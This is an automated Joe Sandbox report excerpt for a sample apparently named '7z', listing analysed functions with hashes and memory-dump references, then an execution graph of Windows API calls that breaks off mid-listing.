                                                                                                                                                                                                                                                                            Function 00676B58 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                                                            • Instruction ID: 348291498973637b3875f344f3a7b60c275ce3301afec13717dc325a8bf78f97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B231F473615A808ACB619F25D8506E97762F3C9FE4F18822AFFAE47794DB34C842C704
                                                                                                                                                                                                                                                                            Function 0068A034 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                                                            • Instruction ID: 5e16fb50649434e963c5ccc449dd6b78fc443b5080332ac51c72f1d0f956a085
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08210B73301B8085EB15BFA6EC557A9A357BB46B98F1C822ADF590B381DF74C842C311
                                                                                                                                                                                                                                                                            Function 00664B58 Relevance: 5.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                                                            • Instruction ID: 772c224c5a5c02604a870e845d04f3a9b320c0f6edeff11df3acd6f7030bb481
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6321C177612A9486CB11EF2AD410769B363E785FE8B088228DF6D1B398DF38DC42C354
                                                                                                                                                                                                                                                                            Function 00677780 Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0067779B
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 006777A7
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0067783C
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 00677848
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                            • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                                                                                            • Instruction ID: 479d8bc2c91dbc14c59bb690cbf47038cbfdb3de767257999715ae4a9d62848c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA212326704B4097CB60AF2AE99425933B1FB49B98F289132EF4E47B14DF38D8A5C701
                                                                                                                                                                                                                                                                            Function 0068E7A0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2043655614-0
                                                                                                                                                                                                                                                                            • Opcode ID: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                                                                                            • Instruction ID: 64014d5c62fcb525ece0a806c1bf085b6cce80fd68e22763b6b77542752d62a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E1172B2615B8081CB60EF25E85125D73B6F7C6BE4F20832AAB9D077A8DF39C855C744
                                                                                                                                                                                                                                                                            Function 006A75A4 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                                                                                            • Instruction ID: 92c1a0799cc8a8eb8189df96b8724728a064420dcf533c21230aa3eb76dd06d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A60180A2309B5155EB04AB2A9D613E422579B4AFC4F8854259E058B306EF39CDA6CB18
                                                                                                                                                                                                                                                                            Function 0068C8E8 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                                                                                            • Instruction ID: c0c31fdcda2f801a5caaafb5a16ce2cc489dfca7d7a0d21dffae21f5c97facf9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6501D2A234471141EF04AF2AEC513A832179B0AFE4F848061DE0987302EB3DCDA6C318
                                                                                                                                                                                                                                                                            Function 00673A0C Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                                                                                            • Instruction ID: e61fdba384912bc5cf58dc527885df7f06ed355acaba0e9c3913a3232e29edae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7301D2A230472151EB04AF2ADC523A432279B4AFC4F85D4219E4A87306EB39CEA6D308
                                                                                                                                                                                                                                                                            Function 0068CE98 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                                                                                            • Instruction ID: d0f6192bc1ce57808b77e3f533cd138df4f41f542d19e887c148890f4f930f97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E0192E230575191EB04FF2AD8553A463279B4AFE4FC48525DE0987306EF39CE96C718
                                                                                                                                                                                                                                                                            Function 0066538C Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                                                                                            • Instruction ID: 156cefd65626ee4d4c7d9d187de265c7a514644e31239f257adffe19f06312c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E01D8B3314D95859A21FE57D89156AA715AB52FF5B1D4119EF2D1B380EF70C843C300
                                                                                                                                                                                                                                                                            Function 00681474 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                                                                                            • Instruction ID: e35246e0dac042f5cc5582b71e061a10234f187662176182d5fc1a3d3143391c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BF0BEA3701984898B10BE26DCA01A8A36AAF57BA8B1C0235AF1D1B384EE20CC438300
                                                                                                                                                                                                                                                                            Function 006A7968 Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                                                                                            • Instruction ID: c20bc9305f01940128197fbd66154e6cf08326054c320dd84e82b33b3d7992f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF0B4637099808A8B50BE27DCA0169A316BB87BA470C0135EF1D1B785DF20CC628304
                                                                                                                                                                                                                                                                            Function 00680BBC Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                                                            • Instruction ID: ada027835a10c5826412f617a1fc45587d0f0f2e31447e99c9de1cbe572bdfbd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F082B3B06C8489DB51BE26DC61168A322AB96FE9B1D4765EF2D1B395DE34C8428304

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:17.8%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:12.2%
                                                                                                                                                                                                                                                                            Total number of Nodes:1482
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                            execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 